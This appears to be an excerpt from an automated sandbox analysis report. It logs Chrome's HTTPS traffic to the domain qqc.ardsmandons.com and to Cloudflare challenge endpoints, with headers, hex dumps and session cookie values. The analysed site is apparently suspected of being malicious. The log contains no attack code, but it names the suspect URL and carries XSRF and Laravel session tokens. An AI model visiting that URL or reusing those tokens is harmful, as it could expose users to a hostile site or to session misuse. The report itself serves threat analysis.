                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 56 31 65 59 44 4e 76 5a 57 42 57 56 6a 70 59 4d 33 31 54 51 45 70 71 65 46 42 2b 68 6b 39 49 66 6e 73 39 53 46 6c 69 61 6d 43 51 63 6c 47 53 66 6f 35 55 6c 35 5a 79 64 6f 6d 62 5a 70 4e 74 6f 58 39 77 6b 33 47 46 64 6e 47 6a 6d 6e 70 32 67 59 4a 6e 66 6f 6c 6b 6e 4b 43 54 70 71 61 43 6a 72 43 4f 65 5a 79 7a 6c 70 43 34 6c 72 65 4f 6b 5a 75 54 6b 4d 50 47 6d 72 65 6f 6f 72 79 73 6d 38 6d 6b 78 64 47 75 71 37 53 55 78 39 62 4a 78 37 4b 36 71 4d 33 66 7a 63 58 54 73 63 66 51 35 73 57 37 32 4f 58 4a 76 39 79 71 7a 63 50 67 70 39 48 48 35 4c 62 56 79 39 54 4c 32 63 2f 59 79 39 33 54 33 4e 76 68 31 2b 44 5a 39 66 62 34 79 77 6a 39 2b 4f 37 75 30 76 44 4c 46 75 73 61 47 66 48 37 44 65 6a 55 33 77 72 72 32 42 2f 37 37 39 77 6a 33 76 50 67 4a 79 72 33 35 43 77 4b
                                                                                                                          Data Ascii: V1eYDNvZWBWVjpYM31TQEpqeFB+hk9Ifns9SFliamCQclGSfo5Ul5ZydombZpNtoX9wk3GFdnGjmnp2gYJnfolknKCTpqaCjrCOeZyzlpC4lreOkZuTkMPGmreoorysm8mkxdGuq7SUx9bJx7K6qM3fzcXTscfQ5sW72OXJv9yqzcPgp9HH5LbVy9TL2c/Yy93T3Nvh1+DZ9fb4ywj9+O7u0vDLFusaGfH7DejU3wrr2B/779wj3vPgJyr35CwK
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 5a 4b 61 46 78 77 61 48 42 65 57 55 31 61 54 33 61 45 63 6c 64 69 63 32 5a 56 6a 47 31 70 57 59 42 37 59 6e 4b 55 64 57 78 6a 59 6d 6c 5a 64 6e 71 49 6b 6e 6c 5a 65 70 4b 44 63 6f 61 62 69 48 56 67 67 33 64 31 66 6f 4a 39 66 5a 47 6c 68 47 32 56 6f 6f 53 32 72 36 2b 48 6c 59 57 7a 6e 6e 6d 73 6c 61 4b 68 77 37 6d 57 70 61 57 2b 6c 62 71 2f 6f 70 75 74 72 61 53 6b 30 36 32 70 6f 38 65 69 78 71 66 61 30 37 47 76 76 4d 2f 57 72 71 32 6b 76 73 61 68 74 74 69 38 78 61 58 61 76 38 72 62 7a 72 33 30 31 64 48 42 36 4f 50 4b 32 76 7a 64 33 4d 7a 49 38 39 72 65 34 74 37 35 36 4f 62 6d 2f 65 7a 71 36 67 4c 77 37 75 34 47 39 50 4c 79 43 76 6a 32 39 67 37 38 2b 76 6f 53 41 66 37 2b 46 67 50 78 4a 52 45 48 39 53 6b 56 43 2f 6b 74 47 51 2f 39 4d 52 30 54 41 54 45 68 46
                                                                                                                          Data Ascii: ZKaFxwaHBeWU1aT3aEcldic2ZVjG1pWYB7YnKUdWxjYmlZdnqIknlZepKDcoabiHVgg3d1foJ9fZGlhG2VooS2r6+HlYWznnmslaKhw7mWpaW+lbq/oputraSk062po8eixqfa07GvvM/Wrq2kvsahtti8xaXav8rbzr301dHB6OPK2vzd3MzI89re4t756Obm/ezq6gLw7u4G9PLyCvj29g78+voSAf7+FgPxJREH9SkVC/ktGQ/9MR0TATEhF
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 65 67 46 31 61 56 49 52 6c 65 56 4e 52 61 58 6c 57 56 6d 46 6d 61 6d 35 71 68 33 4a 78 6c 49 6c 6f 63 56 46 75 65 48 5a 70 6b 32 78 6f 6d 35 5a 74 66 58 32 56 63 33 4e 70 66 34 78 36 69 71 43 4a 61 58 6d 6c 67 70 43 30 6f 70 47 41 70 34 79 4b 63 36 75 74 6b 4c 2b 5a 6c 5a 53 7a 6d 5a 69 59 78 72 69 33 6e 4b 57 56 77 36 44 41 72 61 71 67 78 4b 47 71 70 39 65 69 72 37 79 71 79 4d 6d 2b 72 72 33 56 73 73 44 6b 77 37 66 43 30 38 61 31 37 4d 32 2f 76 4c 71 39 79 73 71 72 72 65 6a 59 31 74 4c 4e 32 38 62 5a 36 64 72 4e 76 64 4c 4e 7a 75 62 57 31 2b 4c 7a 35 74 55 4e 37 65 6e 5a 41 66 76 69 38 68 58 78 37 75 67 5a 2b 51 37 6e 35 66 30 4f 36 75 72 31 2b 76 34 44 2f 68 77 48 42 69 6b 65 2f 41 62 6c 41 77 30 4c 2f 53 67 42 2f 44 41 72 41 68 49 53 4b 67 67 49 2f 52
                                                                                                                          Data Ascii: egF1aVIRleVNRaXlWVmFmam5qh3JxlIlocVFueHZpk2xom5ZtfX2Vc3Npf4x6iqCJaXmlgpC0opGAp4yKc6utkL+ZlZSzmZiYxri3nKWVw6DAraqgxKGqp9eir7yqyMm+rr3VssDkw7fC08a17M2/vLq9ysqrrejY1tLN28bZ6drNvdLNzubW1+Lz5tUN7enZAfvi8hXx7ugZ+Q7n5f0O6ur1+v4D/hwHBike/AblAw0L/SgB/DArAhISKggI/R
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 64 56 64 6c 5a 57 6c 59 69 33 64 74 62 57 79 48 67 57 42 64 66 32 64 6a 5a 5a 52 37 5a 33 53 62 6a 33 78 34 6e 33 75 42 62 6f 47 62 68 32 43 6a 6d 58 75 47 65 5a 31 2f 6a 59 32 6c 68 49 36 52 71 5a 53 53 68 61 6d 4c 6c 6f 71 62 6a 35 71 4e 73 5a 4f 68 75 4a 69 54 6f 4d 65 37 71 59 53 2f 70 35 71 61 70 71 2b 65 6e 61 4b 32 71 4c 4c 45 79 72 6d 55 7a 39 4b 72 71 4e 4f 36 73 4e 53 79 7a 38 58 41 33 39 32 37 78 4f 76 41 75 61 6a 72 35 73 54 6b 31 74 50 42 35 75 2f 4d 32 64 6a 7a 38 73 76 49 38 39 72 51 39 4e 4c 76 35 65 51 41 34 39 62 57 34 76 66 74 36 64 33 6d 34 38 7a 78 36 75 50 31 43 41 37 73 31 4e 55 49 2f 66 6e 74 2b 76 50 39 2f 66 72 78 41 77 73 55 43 67 63 4f 48 66 6e 34 49 41 38 46 4e 44 55 67 42 42 49 47 46 41 67 61 47 6a 4d 52 4d 53 49 33 49 69 45
                                                                                                                          Data Ascii: dVdlZWlYi3dtbWyHgWBdf2djZZR7Z3Sbj3x4n3uBboGbh2CjmXuGeZ1/jY2lhI6RqZSShamLloqbj5qNsZOhuJiToMe7qYS/p5qapq+enaK2qLLEyrmUz9KrqNO6sNSyz8XA3927xOvAuajr5sTk1tPB5u/M2djz8svI89rQ9NLv5eQA49bW4vft6d3m48zx6uP1CA7s1NUI/fnt+vP9/frxAwsUCgcOHfn4IA8FNDUgBBIGFAgaGjMRMSI3IiE
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 46 78 34 65 30 74 38 67 4a 52 69 6a 4a 52 51 68 59 71 5a 69 31 68 70 69 4a 75 4b 61 34 4f 43 64 58 32 61 66 5a 6c 6b 5a 48 75 62 64 5a 74 2f 71 6d 36 44 6f 35 32 4c 6b 6f 6d 6b 74 33 65 31 6b 49 65 34 75 62 65 56 6b 63 44 42 76 4a 6a 47 6e 35 66 43 70 4d 33 47 75 71 43 5a 6f 35 44 52 6f 72 44 4f 31 36 36 6a 6d 4c 65 78 33 4a 76 4c 71 62 4c 5a 75 74 75 39 34 4f 69 34 30 2b 66 56 7a 61 69 35 7a 39 72 41 7a 63 50 4d 76 39 48 48 30 4d 2f 56 79 39 54 4e 36 65 72 73 76 2f 76 78 37 4f 4c 69 78 75 53 2f 43 74 2f 44 77 77 41 52 42 78 44 70 35 50 4c 67 7a 4e 66 72 34 39 41 58 30 75 66 55 47 78 37 72 32 43 41 53 37 39 77 6b 41 50 50 67 4b 43 72 33 35 43 30 65 2b 2b 67 78 44 41 44 73 4e 65 34 45 38 44 6b 36 43 50 51 2b 47 41 7a 34 51 6b 49 51 2f 45 63 32 46 41 46 4c
                                                                                                                          Data Ascii: Fx4e0t8gJRijJRQhYqZi1hpiJuKa4OCdX2afZlkZHubdZt/qm6Do52Lkomkt3e1kIe4ubeVkcDBvJjGn5fCpM3GuqCZo5DRorDO166jmLex3JvLqbLZutu94Oi40+fVzai5z9rAzcPMv9HH0M/Vy9TN6ersv/vx7OLixuS/Ct/DwwARBxDp5PLgzNfr49AX0ufUGx7r2CAS79wkAPPgKCr35C0e++gxDADsNe4E8Dk6CPQ+GAz4QkIQ/Ec2FAFL


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.449764172.67.177.194434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:38 UTC1325OUTGET /favicon.ico HTTP/1.1
                                                                                                                          Host: qqc.ardsmandons.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://qqc.ardsmandons.com/4R2xjWr/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6Ijdhd3hUZFNLcmQxYUpHVnlQQjRENkE9PSIsInZhbHVlIjoiaW1BdG5Kd1VoNjRXZTVtRkEvQ3JmZE9TYk5KdlZ1dWErWG4xOVpFc2FJeXhtMk42MXR3STh4TzJzbENBdTZQcWxZaWY1a2wxQ3FEVXN2T1V2WXBmZWR2QXI2a1A1aFpFRFlvS1pocnduL2MrS0w1ME1LSTgya0lNNEtoK3NDcUEiLCJtYWMiOiI2ZDg0NDE2ZjM1OGVlY2JkNDU2N2M4YzIwNTE1MjYwNzg3ZTkxZmZmYWU0ZTQ5MWY4YTMxNjBmODliOGJhYTlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlwY1J6RmxKMm1vdGlaQWNMeFRuWkE9PSIsInZhbHVlIjoicHU3cjlsRzJYeVlHcE5CSGY0QjF2UG90UnJNMjJhZW1ZbnV2NHFnSW5LdjBlaTlGdElLM0RuWFoxZXJENnM3OUozN1h3bktNUTErNmx3SStPa3NIOEZMamdkbGJ0NnJ1RjJJT3J2ZkpGWmkyTkRpbGRhK3Faa2hIYWsxMXQ0YWciLCJtYWMiOiIyMjdmMzgxYWU1ZjMzOWY1YTgzYzFiMmJkZDdlN2M2YmFkYzc1YmQ0ZTMwYjMxNzVhODBiNDRmYjExMGU0OGZlIiwidGFnIjoiIn0%3D
                                                                                                                          2024-11-25 15:42:38 UTC1014INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:38 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=14400
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=70RJmGbFjusI5q%2F7w6atdrBuxIZdTyPkjkH7VRk2BN95bh4VlysmuFzVNyW1jn%2FW820i0GvDDWXgJOkCFRlEBCPvcyGQf3P8gAqgYvo9QEeTHm4VVXygauvSFapZQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=35775&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1522&delivery_rate=79375&cwnd=250&unsent_bytes=0&cid=a6705f414f1fc029&ts=205&x=0"
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 9313
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bff1fcff8ce8-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2351&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1903&delivery_rate=1323662&cwnd=234&unsent_bytes=0&cid=4ebacb65c203ebe9&ts=516&x=0"
                                                                                                                          2024-11-25 15:42:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.449766104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:39 UTC596OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:39 UTC379INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:39 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 7
                                                                                                                          Connection: close
                                                                                                                          cf-chl-out: L9pTh6i7vZmvEQUqAAF/rTWQ3JMFNOT6Fns=$DZH9d713zg1ly+IZ
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bffa1f0c42a6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:39 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                          Data Ascii: invalid


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.449767104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:39 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8e82bfcf1ab94363/1732549357172/tddkygsc6Gt9a0U HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:40 UTC200INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:40 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bffdaf7180d9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 35 00 00 00 04 08 02 00 00 00 a1 a2 e0 2f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDR5/IDAT$IENDB`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.44976835.190.80.14434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:40 UTC536OUTOPTIONS /report/v4?s=70RJmGbFjusI5q%2F7w6atdrBuxIZdTyPkjkH7VRk2BN95bh4VlysmuFzVNyW1jn%2FW820i0GvDDWXgJOkCFRlEBCPvcyGQf3P8gAqgYvo9QEeTHm4VVXygauvSFapZQg%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Origin: https://qqc.ardsmandons.com
                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:40 UTC336INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          access-control-max-age: 86400
                                                                                                                          access-control-allow-methods: OPTIONS, POST
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: content-type, content-length
                                                                                                                          date: Mon, 25 Nov 2024 15:42:40 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.449770104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:41 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8e82bfcf1ab94363/1732549357172/tddkygsc6Gt9a0U HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:42 UTC200INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:41 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82c0085c2e43b6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:42 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 35 00 00 00 04 08 02 00 00 00 a1 a2 e0 2f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDR5/IDAT$IENDB`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.449772104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:41 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8e82bfcf1ab94363/1732549357173/ccce095667aa92a7495f36d6268a9260aff23fd8f55ad65a788d14cc1ea784da/ODAl4Am2Zd02-Om HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:42 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:42 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 1
                                                                                                                          Connection: close
                                                                                                                          2024-11-25 15:42:42 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 7a 4d 34 4a 56 6d 65 71 6b 71 64 4a 58 7a 62 57 4a 6f 71 53 59 4b 5f 79 50 39 6a 31 57 74 5a 61 65 49 30 55 7a 42 36 6e 68 4e 6f 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gzM4JVmeqkqdJXzbWJoqSYK_yP9j1WtZaeI0UzB6nhNoAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                          2024-11-25 15:42:42 UTC1INData Raw: 4a
                                                                                                                          Data Ascii: J


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.44977135.190.80.14434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:41 UTC474OUTPOST /report/v4?s=70RJmGbFjusI5q%2F7w6atdrBuxIZdTyPkjkH7VRk2BN95bh4VlysmuFzVNyW1jn%2FW820i0GvDDWXgJOkCFRlEBCPvcyGQf3P8gAqgYvo9QEeTHm4VVXygauvSFapZQg%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 437
                                                                                                                          Content-Type: application/reports+json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:41 UTC437OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 31 32 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 71 71 63 2e 61 72 64 73 6d 61 6e 64 6f 6e 73 2e 63 6f 6d 2f 34 52 32 78 6a 57 72 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 37 37 2e 31 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65
                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":3127,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://qqc.ardsmandons.com/4R2xjWr/","sampling_fraction":1.0,"server_ip":"172.67.177.19","status_code":404,"type":"http.error"},"type":"network-e
                                                                                                                          2024-11-25 15:42:42 UTC168INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          date: Mon, 25 Nov 2024 15:42:41 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.449773104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:44 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 31849
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
